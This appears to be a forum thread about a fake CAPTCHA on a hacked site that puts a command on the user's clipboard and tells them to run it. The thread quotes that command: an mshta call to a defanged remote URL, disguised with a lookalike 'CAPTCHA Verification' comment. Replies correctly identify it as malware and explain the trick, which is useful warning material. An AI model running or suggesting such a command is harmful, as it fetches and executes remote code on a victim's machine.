The text it wants me to run is the following:
mshta https://check/[dot]dasoc[dot]icu/gkcxv[dot]google?i=888x8x8x-x8xx-8888-xxx8-a00888888a1ab # Humаn, nоt а rоbоt: CAPTCHА Vеrіfісаtіоn ID: 552163’’
Looks like the site got hacked and wants be run malware, but I’ve never seen something like this before.
That looks like the site got hacked and wants you to run malware.
Also, you might want to edit the link to change the
.s in the URL to[dot]so it doesn’t linkify a likely malware link for other users.I figured. That’s why I didn’t run it.
Not sure if you saw my edit since it was after you replied, but you might want to edit the post to change the
.'s in the URL to[dot]so it doesn’t linkify a likely malware link for other users.Done. I also changed the numbers before, but then I didn’t verify that I broke the link.
Probably just an identifier for tracking who ran it.
Nope it is definately malware. It put a command in your clipboard since websites can do this, and then asks you to open a command window to run the command. This command can easily cause you to get and remotely execute an executable. Because this is so obviously dangerous no legit site would ask you to do this.
I was referring to the ?i=number part, just like google uses si for YouTube.